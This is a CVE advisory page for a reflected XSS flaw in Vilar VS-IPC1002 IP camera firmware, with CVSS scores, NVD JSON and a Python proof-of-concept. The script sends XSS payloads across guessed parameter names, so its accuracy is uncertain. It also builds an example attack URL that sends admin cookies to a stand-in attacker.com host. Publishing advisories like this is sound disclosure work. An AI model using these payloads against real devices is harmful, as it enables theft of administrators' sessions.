Security Vulnerability Report
CVE-2025-53701 CVSS 6.1 MEDIUM

CVE-2025-53701

Published: 2025-10-23 14:15:39
Last Modified: 2025-11-04 13:10:53

Description

Vilar VS-IPC1002 IP cameras are vulnerable to Reflected XSS (Cross-site Scripting) attacks because parameters in GET requests sent to the /cgi-bin/action endpoint are not sanitized properly, making it possible to target logged-in admin users. The vendor did not respond in any way. Only version 1.1.0.18 was tested; other versions might be vulnerable as well.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:vimicro:vs-ipc1002_firmware:1.1.0.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:vimicro:vs-ipc1002:-:*:*:*:*:*:*:* - NOT VULNERABLE
Vilar VS-IPC1002 firmware version 1.1.0.18 (confirmed affected)
Vilar VS-IPC1002 other versions (possibly affected, not confirmed by the vendor)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-53701 PoC - Vilar VS-IPC1002 Reflected XSS
# Target: Vilar VS-IPC1002 IP Camera
# Endpoint: /cgi-bin/action

TARGET = "http://target-ip:80"
ENDPOINT = "/cgi-bin/action"


def create_xss_payload():
    """Generate XSS payload for CVE-2025-53701"""
    # Basic XSS payload to test reflection
    payloads = [
        '<script>alert(document.domain)</script>',
        '<img src=x onerror=alert(document.cookie)>',
        '<svg/onload=alert(document.cookie)>'
    ]
    return payloads


def test_reflected_xss():
    """Test for reflected XSS in /cgi-bin/action endpoint"""
    # Common vulnerable parameters
    params_to_test = ['param', 'action', 'id', 'name', 'value', 'type']

    print(f"[*] Testing {TARGET}{ENDPOINT} for CVE-2025-53701")
    print(f"[*] Target: Vilar VS-IPC1002 IP Camera")
    print("-" * 60)

    for param in params_to_test:
        for payload in create_xss_payload():
            try:
                url = f"{TARGET}{ENDPOINT}"
                data = {param: payload}
                response = requests.get(url, params=data, timeout=10)

                # Check if payload is reflected without encoding
                if payload in response.text:
                    print(f"[!] VULNERABLE - Parameter '{param}' reflects payload")
                    print(f" Payload: {payload}")
                    print(f" URL: {response.url}")
                    return True
            except requests.RequestException as e:
                print(f"[-] Error testing {param}: {e}")

    print("[*] No obvious XSS reflection detected")
    return False


def generate_attack_url(target_ip, payload):
    """Generate malicious URL for social engineering attack"""
    malicious_url = f"http://{target_ip}/cgi-bin/action?param={payload}"
    return malicious_url


if __name__ == "__main__":
    test_reflected_xss()

    # Example attack URL generation
    example_ip = "192.168.1.100"
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    attack_url = generate_attack_url(example_ip, xss_payload)
    print(f"\n[*] Example attack URL:\n{attack_url}")
    print("\n[!] Note: This PoC is for authorized security testing only")

References

https://cert.pl/en/posts/2025/10/CVE-2025-53701 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53701", "sourceIdentifier": "[email protected]", "published": "2025-10-23T14:15:39.107", "lastModified": "2025-11-04T13:10:52.810", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Vilar VS-IPC1002 IP cameras are vulnerable to Reflected XSS (Cross-site Scripting) attacks, because parameters in GET requests sent to /cgi-bin/action endpoint are not sanitized properly, making it possible to target logged in admin users.\nThe vendor did not respond in any way. Only version 1.1.0.18 was tested, other versions might be vulnerable as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vimicro:vs-ipc1002_firmware:1.1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "BFF3572F-8791-43CE-A735-95568316F29B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vimicro:vs-ipc1002:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7B7DA5F-FE1C-461D-A957-60AB93BAD83F"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/10/CVE-2025-53701", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}